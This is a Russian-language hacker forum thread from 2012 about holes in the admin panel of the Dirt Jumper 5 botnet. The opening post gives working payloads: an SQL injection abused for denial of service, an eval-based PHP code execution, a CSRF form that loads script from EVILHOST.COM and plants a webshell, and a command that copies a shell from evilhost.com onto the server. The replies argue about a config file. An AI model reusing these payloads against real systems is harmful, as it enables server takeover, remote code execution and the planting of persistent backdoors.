Старый 04.03.2012, 07:16   #1
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию Админ панель Dirt Jumper 5

Обзор уязвимостей админ панели Dirt Jumper 5

SQL Inj [INSERT]
/index.php:
magic_quotes_gpc=Off
PHP код:
[...]
$ip=$_POST['k'];
[...]
mysql_query(" INSERT INTO `td` (`ip`,`ip2`,`time`)VALUES('$ip','$ip2','$time')");
[...] 
Из инъекции особо ничего не вытянуть, но «обесточить» сервер можно, воспользовавшись тем же BENCHMARK'ом.

Если честно, непонятно, что курили разработчики, но команды хранятся в файле img.gif и для показа ботам файл инклудится.
/index.php:
PHP код:
[...]
include 
"img.gif";
[...] 
Code Execution
Нужны права админа.
1. Добавляем новую команду:
Код:
<?php @eval($_POST[cmd]); ?>
* Никакой фильтрации нет вообще.
2. POST index.php:
Код:
k=1&cmd=phpinfo()
Если знаете параметр $GET_login, который прописывается в конфиге(по дефолту dj5) можно провернуть CSRF результатом которого будет выполнение php кода и xss.
Код:
<body onload='document.csrf.submit()'>
<form method="POST" name="csrf" action="http://localhost/admin/admin.php?login=dj5&info=1" class="form">
<input type="hidden" name="url" value="url=google.de</textarea><script src='http://EVILHOST.COM/EVIL.JS'></SCRIPT><?php @eval($_GET[s]); ?>" />
<input type="hidden" name="flows" value="25" />
<input type="hidden" name="mode" value="4" />
<input type="hidden" name="save" value="Save" />
</form>
</body>
Где http://EVILHOST.COM/EVIL.JS ссылка на ваш зловредный js код.
* Можно еще сразу же средствами js отправить POST запрос на /index.php, и выполнить код, например
Код:
copy("http://evilhost.com/shell.txt", "shell.php"); file_put_contents("img.gif", "");
Тогда шелл автоматически зальется(если прав хватит), а img.gif очистится.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 04.03.2012, 18:21   #2
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Прикольно. Про зависимости лучше указать, а по поводу img.gif это скорее всего сапа, а не конфиг файл.
Nightmare вне форума   Ответить с цитированием
Старый 04.03.2012, 20:08   #3
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Прикольно. Про зависимости лучше указать, а по поводу img.gif это скорее всего сапа, а не конфиг файл.
Нет, там хранится именно конфигурация для ботов, параметр|параметр|параметр |параметр-домен.
__________________
|
Boolean вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot